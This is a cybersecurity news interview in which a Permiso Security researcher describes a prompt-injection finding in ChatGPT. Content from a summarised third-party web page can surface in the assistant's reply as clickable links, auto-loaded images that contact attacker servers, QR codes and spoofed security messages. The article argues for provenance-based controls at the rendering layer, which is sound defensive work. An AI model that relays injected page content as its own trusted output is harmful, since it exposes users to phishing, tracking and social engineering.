When Third-Party Content Appears Inside ChatGPT Responses

When Third-Party Content Appears Inside ChatGPT Responses, Trust Gets Transferred Unintentionally

Published

Written by:

Vishwa Pandagle
Cybersecurity Staff Editor

ChatGPT - Data Streams - Prompt - External Data

Question: In a study, Permiso Security discovered a vulnerability in ChatGPT's Markdown rendering that could allow content from third-party web pages to seep into ChatGPT responses. Where do filters need to be added to prevent phishing, tracking, and social engineering attacks? What was the most unexpected finding during the investigation?

Andi Ahmeti, Threat Researcher at Permiso Security

One of the most interesting aspects of this research was that the issue was not fundamentally a model problem, it was a trust boundary problem.

Most discussions around prompt injection focus on whether a model can be influenced by untrusted content. At this point, we know the answer is yes. The more important question is what happens after the model has been influenced.

In our investigation, we found that content originating from a third-party web page could make its way into a ChatGPT response and be rendered as

clickable links,
images,
QR codes, and
system-style messages inside a trusted assistant interface.
- The real risk was not the prompt injection itself; it was the transformation of untrusted content into trusted UI.
- The most unexpected finding was how little user interaction was required.

We tend to think about phishing as something that begins with a click. In some of our tests, simply asking ChatGPT to summarize a page was enough to trigger remote image requests to attacker-controlled infrastructure.

In others, we were able to render QR codes and spoofed account-security messaging directly inside the assistant response. The attack surface extended beyond traditional phishing and into passive tracking and cross-device social engineering.

From a defensive perspective, I don't believe this problem can be solved exclusively at the model layer. The industry has invested heavily in prompt-injection detection and guardrails, but attackers only need one successful path through those controls.

The more reliable place to enforce security is at the rendering layer. If content originates from an untrusted source, the client should preserve that context all the way to the user interface.

For example,

Links extracted from summarized web content should not be rendered the same way as links generated by the assistant.
Remote images sourced from third-party content should not be fetched automatically.
QR codes should be treated as encoded URLs rather than harmless images.
- In short, the renderer should apply security controls based on provenance, not just on what the model decides to output.

The larger challenge is that AI systems are increasingly becoming brokers of trust. Users are conditioned to treat assistant responses differently than they treat raw web content. Attackers understand this and are adapting accordingly.

Historically, they had to convince users to trust an email, a document, or a website. Increasingly, they only need to convince an AI system to repeat or reformat their content. What concerns me most is the imbalance between attacker and defender incentives:

Attackers only need to identify one path where content can cross a trust boundary and be rendered in a more trustworthy context.

Defenders, meanwhile, are trying to secure an ecosystem that now spans:

models,
retrieval systems,
agents,
browsers,
renderers,
plugins, and
third-party integrations.

Every new capability expands the number of places where trust can be unintentionally transferred. Organizations should start treating AI rendering layers as part of their attack surface today. Security reviews cannot stop at model behavior.

They need to include:

How retrieved content is displayed
What external resources are automatically loaded
Whether users can distinguish between assistant-generated content and untrusted third-party data.

As AI assistants become more integrated into everyday workflows, those distinctions will matter far more than whether a prompt injection technically succeeds.

Power Without Control: What Anthropic’s Claude Fable 5 and Mythos 5 Mean for Enterprise Security, AI Governance, and Risk

Supply Chain Incidents Reveal the True State of Incident Response as Security, IT, and OT Teams Struggle to Assign Accountability

How Microsoft Copilot Studio Creator Permissions Expand the Blast Radius of Prompt Injection Attacks

Finding More Vulnerabilities Won't Fix AppSec's Biggest Challenge if AI Can't Explain What's at Risk

How Scammers are Using AI to Target Football Fans

Security Debt Rarely Arrives All at Once but its Consequences Often Do

Welcome to TechNadu

This website uses cookies to ensure you get the best experience on our website.